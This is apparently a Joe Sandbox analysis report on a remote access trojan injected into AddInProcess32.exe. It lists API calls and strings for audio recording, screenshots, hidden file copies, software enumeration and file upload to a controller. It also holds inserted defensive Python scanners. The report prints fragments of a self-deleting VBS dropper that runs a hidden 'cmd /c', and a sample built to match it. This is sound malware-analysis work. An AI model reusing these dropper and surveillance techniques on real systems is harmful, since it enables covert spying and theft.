                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                        • SetEvent.KERNEL32 ref: 0041B219
                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                        • CloseHandle.KERNEL32 ref: 0041B23A
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                        • API String ID: 738084811-2094122233
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                        • API ID: File$Write$Create
                                        • String ID: RIFF$WAVE$data$fmt
                                        • API String ID: 1602526932-4212202414
                                        APIs
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                        • API ID: AddressHandleModuleProc
                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                        • API String ID: 1646373207-4283035339
                                        APIs
                                        • _wcslen.LIBCMT ref: 0040CE07
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                        • _wcslen.LIBCMT ref: 0040CEE6
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040CF84
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                        • _wcslen.LIBCMT ref: 0040CFC6
                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                        • ExitProcess.KERNEL32 ref: 0040D062
                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                        • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open
                                        • API String ID: 1579085052-1506045317
                                        APIs
                                        • lstrlenW.KERNEL32(?), ref: 0041C036
                                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                        • lstrlenW.KERNEL32(?), ref: 0041C067
                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                        • _wcslen.LIBCMT ref: 0041C13B
                                        • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                        • GetLastError.KERNEL32 ref: 0041C173
                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                        • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                        • GetLastError.KERNEL32 ref: 0041C1D0
                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                        • String ID: ?
                                        • API String ID: 3941738427-1684325040
                                        APIs
                                        • API ID: _free$EnvironmentVariable$_wcschr
                                        • String ID:
                                        • API String ID: 3899193279-0
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                        • Sleep.KERNEL32(00000064), ref: 00412E94
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                        • String ID: /stext "$0TG$0TG$NG$NG
                                        • API String ID: 1223786279-2576077980
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                        • API String ID: 2490988753-744132762
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                        • API ID: CloseEnumOpen
                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 1332880857-3714951968
                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                        • GetCursorPos.USER32(?), ref: 0041D5E9
                                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                        • ExitProcess.KERNEL32 ref: 0041D665
                                        • CreatePopupMenu.USER32 ref: 0041D66B
                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        APIs
                                        • API ID: _free$Info
                                        • String ID:
                                        • API String ID: 2509303402-0
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                        • __aulldiv.LIBCMT ref: 00408D4D
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                        • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                        • API String ID: 3086580692-2582957567
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                        • _free.LIBCMT ref: 004512FF
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00451321
                                        • _free.LIBCMT ref: 00451336
                                        • _free.LIBCMT ref: 00451341
                                        • _free.LIBCMT ref: 00451363
                                        • _free.LIBCMT ref: 00451376
                                        • _free.LIBCMT ref: 00451384
                                        • _free.LIBCMT ref: 0045138F
                                        • _free.LIBCMT ref: 004513C7
                                        • _free.LIBCMT ref: 004513CE
                                        • _free.LIBCMT ref: 004513EB
                                        • _free.LIBCMT ref: 00451403
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00419FB9
                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                        • API String ID: 489098229-1431523004
                                        • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                        • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
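The function above initialises GDI+, creates a directory and formats file names from GetLocalTime with the patterns "time_%04i%02i%02i_%02i%02i%02i" and "wnd_%04i%02i%02i_%02i%02i%02i", which is how the RAT names its captured images. The following triage helper is an added example (not code from the Joe Sandbox report or from Remcos): it recognises that naming scheme in a directory listing and turns it into a capture timeline. It assumes the format fields are filled in SYSTEMTIME order (year, month, day, hour, minute, second) and that any file extension may follow; the listing it runs on is constructed.

```python
"""Triage helper for the capture-file naming scheme in the function above.
Added example; it is not code from the Joe Sandbox report or from Remcos.
Assumptions: the "time_%04i%02i%02i_%02i%02i%02i" / "wnd_..." formats are
filled from the SYSTEMTIME returned by the GetLocalTime call in that function,
in year-month-day_hour-minute-second order, and any file extension may follow.
"""
import re
from datetime import datetime
from typing import Optional

CAPTURE_NAME = re.compile(
    r"^(?P<kind>time|wnd)_(?P<y>\d{4})(?P<mo>\d{2})(?P<d>\d{2})"
    r"_(?P<h>\d{2})(?P<mi>\d{2})(?P<s>\d{2})(?:\.[A-Za-z0-9]+)?$"
)


def parse_capture_name(name: str) -> Optional[dict]:
    """Return {'kind': 'time'|'wnd', 'ts': datetime, 'name': name} for a file
    name that follows the scheme, or None for anything else (including names
    that match the shape but encode an impossible date such as month 13)."""
    m = CAPTURE_NAME.match(name)
    if not m:
        return None
    try:
        ts = datetime(int(m["y"]), int(m["mo"]), int(m["d"]),
                      int(m["h"]), int(m["mi"]), int(m["s"]))
    except ValueError:
        return None
    return {"kind": m["kind"], "ts": ts, "name": name}


def capture_timeline(names):
    """Sort recognised capture files into chronological order so the
    operator's screenshot cadence can be read off a directory listing."""
    hits = [h for h in map(parse_capture_name, names) if h]
    return sorted(hits, key=lambda h: h["ts"])


# Constructed directory listing (not from the report) mixing capture-style
# names with the noise an analyst would see alongside them.
SAMPLE_LISTING = [
    "wnd_20240925_143012.jpg",
    "time_20240925_143005.jpg",
    "time_20240925_143105.jpg",
    "time_20241325_000000.jpg",   # month 13: shape matches, date does not
    "desktop.ini",
    "time_2024.jpg",
]

if __name__ == "__main__":
    for h in capture_timeline(SAMPLE_LISTING):
        print(h["ts"].isoformat(), h["kind"], h["name"])
```

Run it against a listing of the directory the CreateDirectoryW call creates; the gap between consecutive "time_" entries is the configured capture interval, and "wnd_" entries mark window-triggered captures.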
                                        APIs
                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                          • Part of subcall function 004136F8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                          • Part of subcall function 004136F8: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                          • Part of subcall function 004136F8: RegCloseKey.KERNELBASE(00000000), ref: 00413738
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                        • ExitProcess.KERNEL32 ref: 0040D9C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                        • API String ID: 1913171305-3159800282
                                        • Opcode ID: 1919afdde95df0f7d5e8eaec93ad62173513c64864e24cca9e1727ee7ecd3b6d
                                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                        • Opcode Fuzzy Hash: 1919afdde95df0f7d5e8eaec93ad62173513c64864e24cca9e1727ee7ecd3b6d
                                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
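The string list above (".vbs", "Temp", "exepath", the two CreateObject fragments and ShellExecuteW "open" followed by ExitProcess) is the RAT writing a helper script into Temp that runs a hidden cmd /c and then deletes itself with DeleteFile(Wscript.ScriptFullName). The following scanner is an added example, not code from the Joe Sandbox report or from Remcos: it scores a script body for that pair of idioms so a dropped .vbs can be triaged from disk or from a file-creation event. The command Remcos places inside the cmd /c quotes is not recoverable from the report, so the constructed sample uses a made-up path there.

```python
"""Static check for the self-deleting helper script whose pieces appear in
the string list above: a .vbs dropped in %TEMP% that runs a hidden
'cmd /c "..."' through WScript.Shell and then removes itself with
Scripting.FileSystemObject.DeleteFile(Wscript.ScriptFullName).
Added example; not code from the Joe Sandbox report or from Remcos.
The command inside the cmd /c quotes is not recoverable from the report,
so the constructed sample below uses a made-up path there."""
import re
from pathlib import PureWindowsPath

# Patterns assembled from the literal fragments in the report. VBScript is
# case-insensitive and whitespace-tolerant, so the regexes are too.
PATTERNS = {
    # CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
    "self_delete": re.compile(
        r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"\s*\)\s*\.\s*'
        r'DeleteFile\s*\(\s*WScript\.ScriptFullName\s*\)', re.I),
    # CreateObject("WScript.Shell").Run "cmd /c ""<...>""", 0   (0 = hidden window)
    "hidden_cmd_run": re.compile(
        r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)\s*\.\s*Run\s+"cmd\s+/c\s+""'
        r'.*?"""\s*,\s*0\b', re.I | re.S),
}

INTERESTING_DIRS = {"temp", "tmp"}


def scan_vbs(text: str, path: str = "") -> dict:
    """Score a script body and, optionally, its on-disk path.
    Self-delete alone is also used by legitimate one-shot installers, so the
    strong signal is the combination of both idioms, ideally under %TEMP%."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(text)]
    parts = [p.lower() for p in PureWindowsPath(path).parts] if path else []
    in_temp = any(p in INTERESTING_DIRS for p in parts)
    score = len(hits) + (1 if hits and in_temp else 0)
    verdict = "suspicious" if score >= 2 else "review" if score == 1 else "clean"
    return {"indicators": hits, "in_temp": in_temp, "score": score, "verdict": verdict}


# Constructed samples (not taken from the analysed file).
SAMPLE_DROPPER = (
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\user\\AppData\\Local\\Temp\\dropped.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
SAMPLE_LOGON_SCRIPT = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
    'fso.CopyFile "\\\\fileserver\\share\\banner.txt", "C:\\Users\\Public\\banner.txt"\r\n'
    'CreateObject("WScript.Shell").Run "notepad.exe C:\\Users\\Public\\banner.txt", 1\r\n'
)

if __name__ == "__main__":
    print(scan_vbs(SAMPLE_DROPPER, r"C:\Users\user\AppData\Local\Temp\cleanup.vbs"))
    print(scan_vbs(SAMPLE_LOGON_SCRIPT, r"C:\Scripts\logon.vbs"))
```

Because the script deletes itself as its last act, the on-disk copy is short-lived; feeding file-creation telemetry (or a Sysmon FileCreate event with the captured content) into scan_vbs is more reliable than a later disk sweep.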
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                        • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                        APIs
                                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                        • GetLastError.KERNEL32 ref: 00455CEF
                                        • __dosmaperr.LIBCMT ref: 00455CF6
                                        • GetFileType.KERNEL32(00000000), ref: 00455D02
                                        • GetLastError.KERNEL32 ref: 00455D0C
                                        • __dosmaperr.LIBCMT ref: 00455D15
                                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                                        • GetLastError.KERNEL32 ref: 00455EB1
                                        • __dosmaperr.LIBCMT ref: 00455EB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                        • __alloca_probe_16.LIBCMT ref: 00453F94
                                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                        • __freea.LIBCMT ref: 00454003
                                        • __freea.LIBCMT ref: 0045400F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                        • String ID: \@E
                                        • API String ID: 201697637-1814623452
                                        • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                        • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: \&G$\&G$`&G
                                        • API String ID: 269201875-253610517
                                        • Opcode ID: f843711e33ddf2e4d4c3baca2ca6b2426e0ab7997c39caf6bf5fac4d84d12184
                                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                        • Opcode Fuzzy Hash: f843711e33ddf2e4d4c3baca2ca6b2426e0ab7997c39caf6bf5fac4d84d12184
                                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 65535$udp
                                        • API String ID: 0-1267037602
                                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                        • __dosmaperr.LIBCMT ref: 0043A8A6
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                        • __dosmaperr.LIBCMT ref: 0043A8E3
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                        • __dosmaperr.LIBCMT ref: 0043A937
                                        • _free.LIBCMT ref: 0043A943
                                        • _free.LIBCMT ref: 0043A94A
                                        Memory Dump Source
